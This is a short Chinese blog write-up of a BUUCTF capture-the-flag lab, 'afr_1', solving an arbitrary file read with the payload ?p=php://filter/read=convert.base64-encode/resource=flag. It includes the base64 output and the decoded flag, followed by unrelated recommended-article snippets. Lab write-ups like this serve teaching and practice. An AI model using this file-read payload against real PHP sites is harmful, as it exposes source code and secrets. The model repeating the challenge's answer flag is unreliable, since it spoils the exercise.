程序地带

《从0到1:CTFer成长之路》--afr_1 BUUCTF


在这里插入图片描述 任意文件读取漏洞 在这里插入图片描述 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 在这里插入图片描述 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 在这里插入图片描述 在这里插入图片描述


php的filter读取一下


?p=php://filter/read=convert.base64-encode/resource=flag

在这里插入图片描述 PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 在这里插入图片描述 n1book{afr_1_solved}


版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/109757355

随机推荐

767. 重构字符串 ( 贪心堆 )

LeetCode:767.重构字符串前两天刚写过,今天就出了每日一题。博客指路:767.重构字符串(贪心堆)解法忘记是在哪看的了&...

lankerens 阅读(462)

Linux操作系统学习笔记(二十五)CPU性能优化

一.前言  本文介绍Linux服务器CPU性能评估和优化的基本方法。二.CPU性能查询工具详解2.1平均负载  平均负载是指单位时间内,系统处于可运行状态和不可中断状态的平均进程数&#x...

Ch_ty 阅读(112)

日志ELK问题

背景:框架采用ELK(filebeat+logstash+kafka+es)1.问题1消息发送失败,单条消息过大kafka采用华为云服务࿰...

zhaoyizhilan 阅读(690)

交换两变量值的方法

引自版主:引入第三变量作为中间值优点:适用于任何类型;缺点:需要额外引入第三变量不引入第三变量加减法缺点:只能处理整型࿰...

Jiu_R 阅读(244)